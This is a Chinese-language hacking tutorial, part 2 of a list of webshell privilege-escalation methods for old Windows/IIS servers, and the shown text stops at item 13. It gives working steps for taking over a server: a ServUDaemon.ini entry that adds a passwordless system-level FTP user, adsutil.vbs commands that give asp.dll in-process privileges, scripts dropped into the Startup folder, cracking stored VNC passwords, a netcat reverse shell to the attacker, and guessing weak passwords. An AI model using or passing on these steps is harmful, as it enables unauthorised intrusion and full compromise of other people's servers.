超全的webshell权限提升方法(2)

4.SU密码夺取 
C:\Documents and Settings\All Users\「开始」菜单\程序\ 
引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转 
进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空 
[USER=WekweN|1] 
Password= 
HomeDir=c:\ 
TimeOut=600 
Maintenance=System 
Access1=C:\|RWAMELCDP 
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYvalues= 
这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限 
5.c:\winnt\system32\inetsrv\data\ 
引用：就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去， 
然后执行 
6.SU溢出提权 
这个网上教程N多 不详细讲解了 
7.运行Csript 
引用：运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提 
升权限 
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再将asp.dll加入特权一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样) 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8.脚本提权 
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs 
9.VNC 
这个是小花的文章 HOHO 
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password 
我们可以用vncx4 
破解它，vncx4使用很简单，只要在命令行下输入 
c:\>vncx4 -W 
然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。 
10.NC提权 
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 
11.社会工程学之GUEST提权 
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮 
箱号 手机号 尽量看看 HOHO 
12.IPC空连接 
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 
13.替换服务